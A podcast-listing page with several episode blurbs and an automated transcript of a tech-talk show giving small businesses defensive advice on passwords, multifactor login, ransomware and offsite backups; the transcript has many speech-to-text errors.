departments, schools, they've all been hit, right? And these ransomware attacks are usually started by a person. I'll link in an email. Now this is a poison link. Most of the time, it used to be a little bit more where it was a word document, an Excel document that had something nasty inside Microsoft, as I've said, many times has truly pulled up their socks. [01:05:45] Okay. So it doesn't happen as much as it used to. Plus with malware defender turned on in your windows operating system. You're going to be a little bit safer next step. A program tries to run. Okay. And it effectively denies access to all of that data. Because it's encrypted it. And then usually what it does so that your computer still works. [01:06:09] Is it encrypts all of you, like your word docs, your Excel docs, your databases, right? Oh, the stuff that matters. And once they've got all of that encrypted, you can't really access it. Yeah. The files there, but it looks like trash now. There's new disturbing trends. It has really developed over the last few months. [01:06:31] So in addition to encrypting your PC, it can now encrypt an entire network and all mounted drives, even drives that are marrying cloud services. Remember this, everybody, this is really a big deal because what will happen here is if you have let's say you've got an old driver G drive or some drive mounted off of your network. [01:06:57] You have access to it from your computer, right? Yeah. You click on that drive. And now you're in there and in the windows side Unix and max are a little different, but the same general idea you have access to you have right. Access to it. So what they'll do is any mounted drive, like those network drives is going to get encrypted, but the same thing is true. [01:07:20] If you are attaching a U S B drive to your company, So that USB drive, now that has your backup on it gets encrypted. So if your network is being used to back up, and if you have a thumb drive a USB drive, it's not really a thumb drive, right? There's external drive, but countered by USP hooked up. [01:07:45] And that's where your backup lives. Your. Because you have lost it. And there have been some pieces of software that have done that for awhile. Yeah. When they can encrypt your network drive, it is really going after all whole bunch of people, because everyone that's using that network drive is now effective, and it is absolutely. [01:08:10] Devastating. So the best way to do this is you. Obviously you do a bit of a local backup. We will usually put a server at the client's site that is used as a backup destiny. Okay. So that servers, the destination, all of the stuff gets backed up there. It's encrypted. It's not on the network per se. It's using a special encrypted protocol between each machine and the backup server. And then that backup servers data gets pushed off site. Some of our clients, we even go so far as to push it. To a tape drive, which is really important too, because now you have something physical that is by the way, encrypted that cannot be accessed by the attacker. [01:09:03] It's offsite. So we have our own data center. The, we run the, we manage the no one else has access to it is ours. And we push all of those backups offsite to our data center, which gives us another advantage. If a machine crashes badly, right? The hard disk fails heaven forbid they get ransomware. We've never had that happen to one of our clients. [01:09:29] Just we've had it happen prior to them becoming clients, is that we can now restore. That machine either virtually in the cloud, or we can restore it right onto a piece of hardware and have them up and running in four hours. It can really be that fast, but it's obviously more expensive than in some. [01:09:51] Are looking to pay. All right, stick around. We've got more to talk about when we come back and what are the Russians doing? How can you protect your small business? If you're a one, man, one woman operation, believe it. You've got to do this as well. Or you could lose everything. In fact, I think our small guys have even more to lose Craig peterson.com. [01:10:16] Backups are important. And we're going to talk about the different types of backups right now, what you should be doing, whether you're a one person, little business, or you are a, multi-national obviously a scale matters. [01:10:32] Protecting your data is one of the most important things you can possibly do. [01:10:36] I have clients who had their entire operating account emptied out, completely emptied. It's just amazing. I've had people pay. A lot of money to hackers to try and get data back. And I go back to this one lady over in Eastern Europe who built a company out of $45 million. By herself. And of course you probably heard about the shark tank people, right? [01:11:07] Barbara Cochran, how she almost lost $400,000 to a hacker. In fact, the money was on its way when she noticed what was going on and was able to stop it. So thank goodness she was able to stop it. But she was aware of these problems was looking for the potential and was able to catch it. How many of us are paying that much attention? [01:11:34] And now one of the things you can do that will usually kind of protect you from some of the worst outcomes. And when it comes to ransomware is to backup. And I know everybody says, yeah, I'm backing up. It's really rare. When we go in and we find a company has been backing up properly, it even happens to us sometimes. [01:11:59] We put them back up regimen in place and things seem to be going well, but then when you need the backup, oh my gosh, we just had this happen a couple of weeks ago. Actually this last week, this is what happened. We have. Something called an FMC, which is a controller from Cisco that actually controls firewalls in our customer's locations. [01:12:26] This is a big machine. It monitors stuff. It's tied into this ice server, which is. Looking for nastiness and we're bad guys trying to break in, right? It's intrusion detection and prevention and tying it into this massive network of a billion data points a day that Cisco manages. Okay. It's absolutely huge. [01:12:48] And we're running it in a virtual machine network. So we. Two big blade. Chassies full of blades and blades are each blade is a computer. So it has multiple CPU's and has a whole bunch of memory. It also has in there storage and we're using something that VMware calls visa. So it's a little virtual storage area network. [01:13:15] That's located inside this chassis and there are multiple copies of everything. So if a storage unit fails, you're still, okay. Everything stays up, it keeps running. And we have it set up so that there's redundancy on pond redundancy. One of the redundancies was to back it up to a file server that we have that's running ZFS, which is phenomenal. [01:13:40] Let me tell you, it is the best file system out there I've never ever had a problem with it. It's just crazy. I can send you more information. If you ever interested, just email me@craigpeterson.com. Anytime. Be glad to send you the open source information, whatever you need. But what had happened is. [01:13:57] Somehow the boot disk of that FMC, that, that firewall controller had been corrupted. So we thought, oh, okay, no problem. Let's look at our backups. Yeah, hadn't backed up since October, 2019. Yeah, and we didn't know it had been silently failing. Obviously we're putting stuff in place to stop that from ever happening again. [01:14:27] So we are monitoring the backups, the, that network. Of desks that was making up that storage area network that had the redundancy failed because the machine itself, somehow corrupted its file system, ext four file system right then are supposed to be corruptible, but the journal was messed up and it was man, what a headache. [01:14:51] And so they thought, okay, you're going to have to re-install. And we were sitting there saying, oh, you're kidding me. Reinstalling this FMC controller means we've got to configure our clients, firewalls that are being controlled from this FMC, all of their networks, all of their devices. We had to put it out. [01:15:07] This is going to take a couple of weeks. So because I've been doing this for so long. I was able to boot up an optics desk and Mount the file system and go in manually underneath the whole FMC, this whole firewall controller and make repairs to it. Got it repaired, and then got it back online. So thank goodness for that. [01:15:33] It happens to the best of us, but I have to say I have never had a new client where they had good backups. Ever. Okay. That, and now that should tell you something. So if you are a business, a small business, whatever it might be, check your backups, double check them. Now, when we're running backups, we do a couple of things. [01:15:57] We go ahead and make sure the backup is good. So remember I mentioned that we h

MSP 1337
Configure and Implement Securely

MSP 1337

Play Episode Listen Later May 11, 2022 38:11


What should we talk about this week? I have been back and forth with topics recently that involve getting started with cybersecurity and have moved into vendor management and other areas of focus that all revolve around one key theme... Reducing risks and protecting ourselves and our clients. Join me as I discuss with Charles Love of Showtech Solutions, configurations and implementation of products and services. Where does the responsibility of vendor stop and MSP responsibilities kick in. What is an appropriately secured implementation of O365 or really any product or service that your clients need and you have been tasked with implementing and managing. We don't go down any rabbit holes on this one!

The Huddle: Conversations with the Diabetes Care Team
The Value of the DCES: Introducing the Value Toolkit

The Huddle: Conversations with the Diabetes Care Team

Play Episode Listen Later Apr 28, 2022 24:46


ResourcesLearn more about the Value Toolkit: diabeteseducator.org/valueRead the Value Toolkit Paper: https://doi.org/10.2337/cd21-0089Read about the Identify, Configure, Collaborate Framework: Identify, Configure, Collaborate: A New Framework for Technology-Enabled Care (diabeteseducator.org)

CPQ Podcast
CPQ Job & Event Cast - Sr. Account Executive

CPQ Podcast

Play Episode Listen Later Apr 28, 2022 1:36


Looking for a remote sales position in the US. Willing to travel 50%. Send email to Frank.Sohn@NovusCPQ.com if you want to get in contact with that person

CPQ Podcast
Interview with Matthias Schwuchow & Kay Giertzuch from Orisa Software

CPQ Podcast

Play Episode Listen Later Apr 24, 2022 31:35


In this episode you hear from Matthias Schwuchow (CEO) and Kay Giertzuch (Head of Sales) from Orisa Software. Their company is headquartered in Jena, Germany and has around 60 employees. Here they talk about their Solution CREALIS CPQ, the top three requirements they see from their customers, you hear why their customers want an offline capability and what their customers think of AI/ML and data analytics and much more. Orisa CPQ Day www.orisa.de/en/cpq-day website: www.orisa.de

Pcontrol Podcast
Como Enviar um Link por e-mail, sem Cair no Spam? Pcontrol Podcast #226

Pcontrol Podcast

Play Episode Listen Later Apr 13, 2022 5:28


Infelizmente, muitas mensagens nem chegam aos usuários e se tornam spam. Para evitar isso, existem algumas maneiras de garantir que seu e-mail não caia em spam e você atinja seu alvo. Pensando nisso, oferecemos sete dicas para ajudá-lo a configurar seus e-mails para uma entrega mais eficiente e evitar que caiam nas caixas de spam de clientes em potencial. Aqui estão algumas delas: Construa sua própria base de leads Utilize uma ferramenta adequada para o disparo de e-mails Forneça a opção de descadastramento Faça os disparos com frequência adequada Configure o DKIM e o SPF da ferramenta Evite enviar conteúdo impróprio Evite comprar listas de e-mails Os profissionais de marketing precisam estar atentos ao executar suas campanhas de marketing e precisam saber como garantir que os e-mails não acabem em spam. Por isso, invista nessas estratégias. Você perceberá que os e-mails terão resultados positivos e deixarão de cair no spam. Mais importante ainda, da perspectiva de um fornecedor, a empresa se torna mais confiável e ética.

Changing Channels with Larry Walsh
Hitachi Vantara's Kim King on Automated Partner Quoting

Changing Channels with Larry Walsh

Play Episode Listen Later Apr 5, 2022 33:17


Larry Walsh talks to Hitachi Vantara Senior Vice President of Strategic Partners and Alliances Kim King on automating quoting for partners to ensure fast, easy access to accurate pricing with minimal human interaction. Buyer expectations have evolved. No longer are companies willing to wait for weeks for quotes on their IT projects. They want the same “Amazon Experience” in their business purchasing that they get in their consumer lives. In other words, they want quotes in days, if not hours. Quoting has been a longtime challenge for both vendors and distributors. Partners receive different discounts and incentives based on their status, sales performance and history, and competencies. Adding to the complexity is the impact of regional pricing differences, the varying needs of customers for different types of products, and the cost of distribution and fulfillment. Configure, price, and quote (CPQ) solutions go a long way toward automating many steps in the process. Through such systems, partners (in theory) gain access to product pricing and quoting based on customer specifications and fulfillment needs. CPQ works well, but to a point. These systems often lack the ability to take into account the nuances of incentives and other financial measures that influence partner buying. As a result, gaps remain that keep the quoting process running long. Storage vendor Hitachi Vantara decided to tackle this problem directly. Rather than adopting a CPQ system, the company formed a “tiger team” to develop a homegrown system based on Salesforce's CRM. The team set out with the goal of creating a platform capable of processing partner quote requests within hours – even for large enterprise deals. Moreover, the system would include all partner incentives, including deal registration and promotional discounts, in the quotes. The development took two years of work that included platform customization and the collection of volumes of pricing, discounting, promotional, and partner data. The effort, thus far, is paying off. The Hitachi Vantara partner quoting system is delivering enterprise-level quotes to partners, often in just hours. The tool, which gives partners a competitive advantage by turning around accurate prices with blazing speed, also gives partners more control over pricing, as they're able to add their own markups with greater ease and consistency. The Hitachi Vantara quoting system isn't perfect and remains a work in progress, but the company is demonstrating how vendors can create better quoting systems that improve partner experience and performance. In this edition of Channelnomics' Changing Channels, Kim King, senior vice president of strategic partners and alliances at Hitachi Vantara, joins host Larry Walsh to discuss how the company developed such a complex quoting system and extracted the benefits they sought.   Follow us, Like us, and Subscribe! Channelnomics: https://channelnomics.com/  LinkedIn: https://bit.ly/2NC6Vli  Twitter: https://twitter.com/Channelnomics    Changing Channels Is a Channelnomics Production Follow @Channelnomics to stay current on the latest #research, #bestpractices, and #resources. At @Channelnomics – the voice of thought leadership – we define #channel trends, chart new #GTM strategies, and #partner with industry leaders to champion #diversity in the channel.     Episode Resources Host Larry Walsh: https://bit.ly/3beZfOa Guest Kim King: https://www.linkedin.com/in/kimberly-king-746463/  

High Intensity Business
357 - How to use Systems to Produce Consistent Workout Quality at Scale

High Intensity Business

Play Episode Listen Later Mar 30, 2022 29:14


If you're having problems with workout quality, client retention, or trainer retention, you might also have a process problem. In this episode, I provide the steps on how to create a workout process for your strength training business. We'll delve into the benefits of creating checklists, how to facilitate iteration, process implementation, and much more.  Get all the processes you need for your strength training studio Optima Strength's Workout Process: Greet the client by name. Shake hand/fist or elbow bump. Comfort/prep client: Offer hand sanitizer. Explain mask is optional. How is your body feeling today? Modify the program if required. Deliver weekly teaching focus. Deliver weekly promotional focus. Retrieve workout card and deliver workout: Brief workout overview. Setup exercise: Configure settings. Describe how the client should enter exercise safely. Provide pre-exercise instruction: What is the exercise? Targeted musculature? Cadence? Goal (aim for X reps or to reach failure in target rep range e.g. 6-8, 8-12). Help the client make progress in resistance and/or reps (do not record advanced techniques). Provide enthusiastic encouragement and specific, positive and corrective feedback throughout each set. Get the client to or as close to MMF in good form as possible. If form is very poor, stop exercise, give corrective feedback, and consider modifying the exercise. Use advanced overload techniques (AOTs) during the workout, but always strive to get the client to MMF in their first set. The client MUST feel that you want them to get results more than they do (this is the most critical part of the entire process). Record performance and any important notes on the workout card. Always finish on time. Always try to complete the workout, but never at the expense of the next client's time slot. Provide honest positive and constructive feedback. Thank the client for coming in for their workout. Wipe down machines.   This podcast episode is brought to you by ARX Do you struggle to attract and retain clients in your strength training studio? ARX machines use breakthrough motorized resistance and computer software to give your clients the perfect workout every time, so you can start to deliver great workouts and grow your business with confidence. Get $500 OFF by going to ARXFit.com/HIB and booking a call with the ARX sales team – Book Here For all of the show notes, links and resources - Click Here

Craig Peterson's Tech Talk
Which Anti-Hacker Techniques Can You Use Against the Russian Hackers?

Craig Peterson's Tech Talk

Play Episode Listen Later Mar 26, 2022 84:29


Weekly Show #1158 We know the Russians have been attacking us. I've talked a lot about it on the radio and TV over the last couple of weeks. So I am doing something special; we are going through the things you can do to stay safe from the latest Russian attacks. Last week, we started doing something I promised we would continue -- how can you protect yourself when it comes to the Russians? The Russians are the bad guys when it comes to bad guys. So there are a few things you can do. And there are a few things; frankly, you shouldn't be doing. And that's precisely what we're going to talk about right now. Today, I explain: - How to protect your back-end - Preventative measures - The new rules of backing up your computer As usual, we'll cover the What, Why, and How's. [Automated transcript follows] [00:00:39] So last week he went over some steps, some things that you can look at that you should look at that are going to help protect you. And we are going to go into this a whole lot more today. And so I want you to stick around and if you miss anything, you can go online. You can go to Craig peterson.com, make sure you sign up there for my email. [00:01:01] And what I'm going to do for you is. Send you a few different documents now where we can chat back and forth about it, but I can send you this. Now I'm recording this on video as well as on audio. So you can follow along if you're watching either on YouTube or. Over on rumble and you can find it also on my website. [00:01:26] I've been trying to post it up there too, but right now let's talk about what we call passive backend protections. So you've got the front end and the front end of course, is. Stuff coming at you, maybe to the firewall I've mentioned last week about customers of mine. I was just looking at a few customers this week, just so I could have an idea of their firewalls. [00:01:52] And they were getting about 10 attacks per minute. Yeah. And these were customers who have requirements from the department of defense because they are defense sub subcontractors. So again, Potential bad guys. So I looked up their IP addresses and where the attacks were coming from. Now, remember that doesn't mean where they originated because the bad guys can hop through multiple machines and then get onto your machine. [00:02:22] What it means is that all, ultimately they ended up. Coming from one machine, right? So there's an IP address of that machine. That's attacking my clients or are attacking my machines. That just happens all the time. A lot of scans, but some definite attacks where they're trying to log in using SSH. [00:02:42] And what I found is these were coming from Slovakia, Russia, and Iran. Kind of what you were expecting, right? The Iranians, they just haven't given up yet. They keep trying to attack, particularly our military in our industry. One of the things we found out this week from, again, this was an FBI notice is that the Russians have been going after our industrial base. [00:03:09] And that includes, in fact, it's more specifically our automobile manufacturers we've already got problems, right? Try buying a new car, try buying parts. I was with my friend, just this. I helped them because he had his car right. Need to get picked up. So I took him over to pick up his car and we chatted a little bit with this small independent automotive repair shop. [00:03:34] And they were telling us that they're getting sometimes six, eight week delays on getting parts and some parts. They just can't. So they're going to everything from junkyards on out, and the worst parts are the parts, the official parts from the car manufacturers. So what's been happening is Russia apparently has been hacking into these various automobile manufacturers and automobile parts manufacturers. [00:04:03] And once they're inside, they've been putting in. A remote control button net. And those botnets now have the ability to wake up when they want them to wake up. And then once they've woken up, what do they do? Who knows? They've been busy erasing machines causing nothing, but having they've been doing all kinds of stuff in the past today, they're sitting there. [00:04:24] Which makes you think they're waiting, it's accumulate as much as you possibly can. And then once you've got it all accumulated go ahead and attack. So they could control thousands of machines, but they're not just in the U S it's automobile manufacturers in Japan. That we found out about. [00:04:44] So that's what they're doing right now. So you've got the kind of that front end and back end protections. So we're going to talk a little bit about the back end. What does that mean? When a cybersecurity guy talks about the backend and the protections. I got it up on my green right now, but here's the things you can do. [00:05:03] Okay. Remember, small businesses are just getting nailed from these guys, because again, they're fairly easy targets. One change your passwords, right? How many times do we have to say that? And yet about 70% of businesses out there are not using a good password methodology. If you want more information on passwords, two factor authentication, you name it. [00:05:30] Just email me M e@craigpeterson.com. I want to get the information out now. You got to make sure that all of the passwords on your systems are encrypted are stored in some sort of a good password vault as you really should be looking at 256 bit encryption or better. I have a vendor of. That I use. So if you get my emails every week, when them, there's the little training. [00:05:59] And so I'll give you a five minute training. It's written usually it's in bullet point for, I'm just trying to help you understand things. That provider of mine has a big database and there's another provider that I use that is for. So the training guys use the database of my provider. [00:06:20] In using that database, they're storing the passwords and the training providers putting passwords in the clinics. Into the database, which is absolutely crazy. So again, if you're a business, if you're storing any sort of personal information, particularly passwords, make sure that you're using good encryption and your S what's called salting the hash, which means. [00:06:46] You're not really storing the password, just joining assaulted hash. I can send you more on this. If you are a business and you're developing software that's, this is long tail stuff here. Configure all of the security password settings so that if someone's trying to log in and is failing that, and you block it, many of us that let's say you're a small business. [00:07:08] I see this all of the time. Okay. You're not to blame. You, but you have a firewall that came from the cable company. Maybe you bought it at a big box retailer. Maybe you bought it online over at Amazon, as hurricane really great for you. Has it got settings on there that lets you say. There's 20 attempts to log in. [00:07:31] Maybe we should stop them. Now, what we do personally for our customers is typically we'll block them at somewhere around three or four failed attempts and then their passwords block. Now you can configure that sort of thing. If you're using. Email. And that's an important thing to do. Let me tell you, because we've had some huge breaches due to email, like Microsoft email and passwords and people logging in and stealing stuff. [00:07:59] It was just a total nightmare for the entire industry last year, but limit the number of login retries as well as you're in there. These excessive login attempts or whatever you want to define it as needs to lock the account. And what that means is even if they have the right password, they can't get in and you have to use an administrative password in order to get in. [00:08:25] You also want to, what's called throttle, the rate of repeated logins. Now you might've gotten caught on this, right? You went to your bank, you went to E-bay, you went to any of these places and all of a sudden. And denied you write it blocked you. That can happen when your account is on these hackers lists. [00:08:45] You remember last week we talked about password spraying while that's a very big deal and hackers are doing the sprain trick all of the time, and that is causing you to get locked out of your own account. So if you do get locked out, remember it might be because someone's trying to break. Obviously you have to enforce the policies. [00:09:09] The capture is a very good thing. Again, this is more for software developer. We always recommend that you use multifactor or two factor authentication. Okay. Do not use your SMS, your text messages for that, where they'll send you a text message to verify who you are. If you can avoid that, you're much better off. [00:09:30] Cause there's some easy ways to get around that for hackers that are determined. Okay. A multi-factor again, installed an intrusion. system. We put right at the network edge and between workstations and servers, even inside the network, we put detection systems that look for intrusion attempts and block intrusion attempts. [00:09:56] A very important use denied lists to block known attackers. We build them automatically. We use some of the higher end Cisco gates. Cisco is a big network provider. They have some of the best hardware and software out there, and you have to subscribe to a lot of people complain. I ain't going to just go buy a firewall for 200 bucks on Amazon. [00:10:18] Why would I pay that much a month just to to have a Cisco firewall? And it's like praying pain for the brand. I've got by logo chert on here. Oh, I wouldn't pay for that. No, it's because they are automatically providing block lists that are updated by the minute sometimes. And then make sure you've got an incident response plan in place. [00:10:44] What are you going to do when they come for you? What are you going to do? Bad boys. Bad. Stick around. We've got a lot more to talk about here as we go. I am explaining the hacks that are going on right now and what you can do as a business and an individual doubt. Protect yourself. Don't go anywhere. [00:11:07] Now we're going to talk about prevention. What can you do an order to stop some of these attacks that are coming from Russia and from other countries, it is huge. People. Believe me, this is a very big problem. And I'm here to help. [00:11:23] hi, I'm Craig Peter Sohn, your chief information security officer. We've reviewed a number of things that are important when it comes to your cyber security and your protection. [00:11:37] We talked about the front end. We talked about the backend. Now we're going to talk about pure prevention and if you're watching. Online. You'll be able to see my slides as they come up, as we talk about some of this stuff and you'll find me on YouTube and you'll also find me on rumble, a fairly new platform out there platform that doesn't censor you for the things you say. [00:12:01] Okay. So here we go. First of all, enabling your active directory password protection is going to. Four's password protection all the way through your business. Now I've had some discussions with people over the months, over the years about this whole thing and what should be done, what can be done, what cannot be done. [00:12:26] Hey, it's a very big deal when it comes to password protection and actor directory, believe it or not, even though it's a Microsoft product is pretty darn good at a few things. One of them is. Controlling all the machines and the devices. One of the things we do is we use an MDM or what used to be a mobile device manager called mass 360. [00:12:51] It's available from IBM. We have a special version of that allows us as a managed security services provider to be able to control everything on people's machines. Active directory is something you should seriously consider. If you are a Mac based shop. Like I am. In fact, I'm sitting right now in front of two max that I'm using right now, you'll find that active directory is a little bit iffy. [00:13:21] Sometimes for max, there are some work around and it's gotten better mastery. 60 is absolutely the way to go, but make sure you've got really good. Passwords and the types of passwords that are most prone to sprain the attacks are the ones you should be banning specifically. Remember the website? Have I been poned? [00:13:45] Yeah. It's something that you should go to pretty frequently. And again, if you miss anything today, just email me M e@craigpeterson.com. Believe me, I am not going to harass you at all. Okay. Now, the next thing that you should be doing is what's called red team blue team. Now the red team is a group of people, usually outside of your organization. [00:14:11] If you're a big company they're probably inside, but the red team is the team that attacks you. They're white hat hackers, who are attacking you, looking for vulnerabilities, looking for things that you should or shouldn't be doing. And then the blue team is the side that's trying to defend. So think of, like war games. [00:14:29] Remember that movie with Matthew Broderick all of those decades ago and how the, he was trying to defend that computer was trying to defend that it moved into an attack mode, right? Red team's attack, blue team is defend. So you want. To conduct simulated attacks. Now w conducting these attacks include saying, oh my let's now put in place and execute our plan here for what are we going to do once we have a. [00:15:01] And you darn well better have a breach plan in place. So that's one of the things that we help as a fractional chief information security officer for companies, right? You've got to get that in place and you have to conduct these simulated attacks and you have to do penetration testing, including password spraying attacks. [00:15:21] There's so many things you can do. The one of the things that we like to do and that you might want to do, whether you're a home user, retiree or a business is go and look online, you can just use Google. I use far more advanced tools, but you can use Google and look for your email address right there. [00:15:40] Look for the names of people inside your organization. And then say wait a minute, does that data actually need to be there? Or am I really exposing the company exposing people's information that shouldn't be out there because you remember the hackers. One of the things they do is they fish you fish as in pH. [00:16:04] So they'll send you an email that looks like. Hey let me see. I know that Mary is the CFO, and I know that Joe's going to be out of town for two weeks in The Bahamas, not a touch. So while he's got. I'm going to send an email to Mary, to get her to do something, to transfer the company's funds to me. [00:16:23] Okay. So that's what that's all about. You've got to make sure, where is our information? And if you go to my company's page, mainstream.net, you'll see on there that I don't list any of the officers or any of the people that are in the company, because that again is a security problem. [00:16:41] We're letting them know. I go to some of these sites, like professional sites lawyers, doctors, countenance, and I find right there all, are there people right there top people or sometimes all of them. And then we'll say, yeah, I went to McGill university, went to Harvard, whatever my B. It's all there. So now they've got great information to fish you, to fish that company, because all they have to do is send an email to say, Hey, you remember me? [00:17:13] We're in Harvard when this class together. And did you have as a professor to see how that works? Okay. You also want to make. That you implement, what's called a passwordless user agent, and this is just so solely effective. If they cannot get into your count, what's going to, what could possibly go wrong, but one of the ways to not allow them into the count is to use. [00:17:41] Biometrics. We use something called duo and we have that tied into the single sign-on and the duo single sign-on works great because what it does now is I put in, I go to a site, I put it into my username and. Pulls up a special splash page that is running on one of our servers. That again asks me for my duo username. [00:18:04] So I've got my username for the site then to my dual username and my duo password single sign on. And then it sends me. To an app on my smart device, a request saying, Hey, are you trying to log into Microsoft? And w whatever it might be at Microsoft, and you can say yes or no, and it uses biometric. [00:18:27] So those biometrics now are great because it says, oh, okay, I need a face ID or I need a thumb print, whatever it might be that allows a generalized, a password, less access. Okay. Password less. Meaning no pass. So those are some of the top things you can do when it comes to prevention. And if you use those, they're never going to be able to get at your data because it's something you have along with something, it works great. [00:19:02] And we like to do this. Some customers. I don't like to go through those hoops of the single sign-on and using duo and making that all work right where we're fine with it. We've got to keep ourselves, at least as secure as the DOD regulations require unlike almost anybody else in industry, I'm not going to brag about it. [00:19:26] But some of our clients don't like to meet the tightest of controls. And so sometimes they don't. I hate to say that, but they just don't and it's a fine line between. Getting your work done and being secure, but I think there's some compromises it can be readily made. We're going to talk next about saving your data from ransomware and the newest ransomware. [00:19:53] We're going to talk about the third generation. That's out there right now. Ransomware, it's getting crazy. Let me tell ya and what it's doing to us and what you can do. What is a good backup that has changed over the last 12 months? It's changed a lot. I used to preach 3, 2, 1. There's a new sheriff in town. [00:20:15] Stick around Craig peterson.com. [00:20:19] 3, 2, 1 that used to be the standard, the gold standard for backing up. It is no longer the case with now the third generation of ransomware. You should be doing something even better. And we'll talk about it now. [00:20:36] We're doing this as a simulcast here. It's on YouTube. It is also on rumble. [00:20:43] It's on my website@craigpeterson.com because we're going through the things that you can do, particularly if you're a business. To stop the Russian invasion because as we've been warned again and again, the Russians are after us and our data. So if you missed part of what we're talking about today, or. [00:21:07] Last week show, make sure you send me an email. me@craigpeterson.com. This is the information you need. If you are responsible in any way for computers, that means in your home, right? Certainly in businesses, because what I'm trying to do is help and save those small businesses that just can't afford to have full-time. [00:21:31] True cyber security personnel on site. So that's what the whole fractional chief information security officer thing is about. Because you just, you can't possibly afford it. And believe me, that guy that comes in to fix your computers is no cyber security expert. These people that are attacking our full time cybersecurity experts in the coming from every country in the world, including the coming from the us. [00:22:01] We just had more arrests last week. So let's talk about ransomware correctly. Ransomware, very big problem. Been around a long time. The first version of ransomware was software got onto your computer through some mechanism, and then you had that red screen. We've all seen that red screen and it says, Hey, pay up buddy. [00:22:23] It says here you need to send so many Bitcoin or a fraction of a Bitcoin or so many dollars worth of Bitcoin. To this Bitcoin wallet. And if you need any help, you can send email here or do a live chat. They're very sophisticated. We should talk about it some more. At some point that was one generation. [00:22:45] One generation two was not everybody was paying the ransoms. So what did they do at that point? They said let me see if they, we can ransom the data by encrypting it and having them pay us to get it back. 50% of the time issue got all your data back. Okay. Not very often. Not often enough that's for sure. [00:23:05] Or what we could do is let's steal some of their intellectual property. Let's steal some of their data, their social security number, their bank, account numbers, et cetera. They're in a, in an Excel spreadsheet on their company. And then we'll, if they don't pay that first ransom, we'll tell them if they don't pay up, we'll release their information. [00:23:26] Sometimes you'll pay that first ransom and then they will hold you ransom a second time, pretending to be a different group of cyber terrorists. Okay. Number three, round three is what we're seeing right now. And this is what's coming from Russia, nears, everything we can tell. And that is. They are erasing our machines. [00:23:48] Totally erasing them are pretty sophisticated ways of erasing it as well, so that it sinks in really, it's impossible to recover. It's sophisticated in that it, it doesn't delete some key registry entries until right at the very end and then reboots and computer. And of course, there's. Computer left to reboot, right? [00:24:11] It's lost everything off of that hard drive or SSD, whatever your boot devices. So let's talk about the best ways here to do some of this backup and saving your data from ransomware. Now you need to use offsite disconnected. Backups, no question about it. So let's talk about what's been happening. [00:24:34] Hospitals, businesses, police departments, schools, they've all been hit, right? And these ransomware attacks are usually started by a person. I'll link in an email. Now this is a poison link. Most of the time, it used to be a little bit more where it was a word document, an Excel document that had something nasty inside Microsoft, as I've said, many times has truly pulled up their socks. [00:25:02] Okay. So it doesn't happen as much as it used to. Plus with malware defender turned on in your windows operating system. You're going to be a little bit safer next step. A program tries to run. Okay. And it effectively denies access to all of that data. Because it's encrypted it. And then usually what it does so that your computer still works. [00:25:26] Is it encrypts all of you, like your word docs, your Excel docs, your databases, right? Oh, the stuff that matters. And once they've got all of that encrypted, you can't really access it. Yeah. The files there, but it looks like trash now. There's new disturbing trends. It has really developed over the last few months. [00:25:48] So in addition to encrypting your PC, it can now encrypt an entire network and all mounted drives, even drives that are marrying cloud services. Remember this, everybody, this is really a big deal because what will happen here is if you have let's say you've got an old driver G drive or some drive mounted off of your network. [00:26:14] You have access to it from your computer, right? Yeah. You click on that drive. And now you're in there and in the windows side Unix and max are a little different, but the same general idea you have access to you have right. Access to it. So what they'll do is any mounted drive, like those network drives is going to get encrypted, but the same thing is true. [00:26:36] If you are attaching a U S B drive to your company, So that USB drive, now that has your backup on it gets encrypted. So if your network is being used to back up, and if you have a thumb drive a USB drive, it's not really a thumb drive, right? There's external drive, but countered by USP hooked up. [00:27:02] And that's where your backup lives. Your. Because you have lost it. And there have been some pieces of software that have done that for awhile. Yeah. When they can encrypt your network drive, it is really going after all whole bunch of people, because everyone that's using that network drive is now effective, and it is absolutely. [00:27:27] Devastating. So the best way to do this is you. Obviously you do a bit of a local backup. We will usually put a server at the client's site that is used as a backup destiny. Okay. So that servers, the destination, all of the stuff gets backed up there. It's encrypted. It's not on the network per se. It's using a special encrypted protocol between each machine and the backup server. And then that backup servers data gets pushed off site. Some of our clients, we even go so far as to push it. To a tape drive, which is really important too, because now you have something physical that is by the way, encrypted that cannot be accessed by the attacker. [00:28:20] It's offsite. So we have our own data center. The, we run the, we manage the no one else has access to it is ours. And we push all of those backups offsite to our data center, which gives us another advantage. If a machine crashes badly, right? The hard disk fails heaven forbid they get ransomware. We've never had that happen to one of our clients. [00:28:46] Just we've had it happen prior to them becoming clients, is that we can now restore. That machine either virtually in the cloud, or we can restore it right onto a piece of hardware and have them up and running in four hours. It can really be that fast, but it's obviously more expensive than in some. [00:29:08] Are looking to pay. All right, stick around. We've got more to talk about when we come back and what are the Russians doing? How can you protect your small business? If you're a one, man, one woman operation, believe it. You've got to do this as well. Or you could lose everything. In fact, I think our small guys have even more to lose Craig peterson.com. [00:29:32] Backups are important. And we're going to talk about the different types of backups right now, what you should be doing, whether you're a one person, little business, or you are a, multi-national obviously a scale matters. [00:29:47] Protecting your data is one of the most important things you can possibly do. [00:29:53] I have clients who had their entire operating account emptied out, completely emptied. It's just amazing. I've had people pay. A lot of money to hackers to try and get data back. And I go back to this one lady over in Eastern Europe who built a company out of $45 million. By herself. And of course you probably heard about the shark tank people, right? [00:30:23] Barbara Cochran, how she almost lost $400,000 to a hacker. In fact, the money was on its way when she noticed what was going on and was able to stop it. So thank goodness she was able to stop it. But she was aware of these problems was looking for the potential and was able to catch it. How many of us are paying that much attention? [00:30:50] And now one of the things you can do that will usually kind of protect you from some of the worst outcomes. And when it comes to ransomware is to backup. And I know everybody says, yeah, I'm backing up. It's really rare. When we go in and we find a company has been backing up properly, it even happens to us sometimes. [00:31:15] We put them back up regimen in place and things seem to be going well, but then when you need the backup, oh my gosh, we just had this happen a couple of weeks ago. Actually this last week, this is what happened. We have. Something called an FMC, which is a controller from Cisco that actually controls firewalls in our customer's locations. [00:31:42] This is a big machine. It monitors stuff. It's tied into this ice server, which is. Looking for nastiness and we're bad guys trying to break in, right? It's intrusion detection and prevention and tying it into this massive network of a billion data points a day that Cisco manages. Okay. It's absolutely huge. [00:32:05] And we're running it in a virtual machine network. So we. Two big blade. Chassies full of blades and blades are each blade is a computer. So it has multiple CPU's and has a whole bunch of memory. It also has in there storage and we're using something that VMware calls visa. So it's a little virtual storage area network. [00:32:32] That's located inside this chassis and there are multiple copies of everything. So if a storage unit fails, you're still, okay. Everything stays up, it keeps running. And we have it set up so that there's redundancy on pond redundancy. One of the redundancies was to back it up to a file server that we have that's running ZFS, which is phenomenal. [00:32:56] Let me tell you, it is 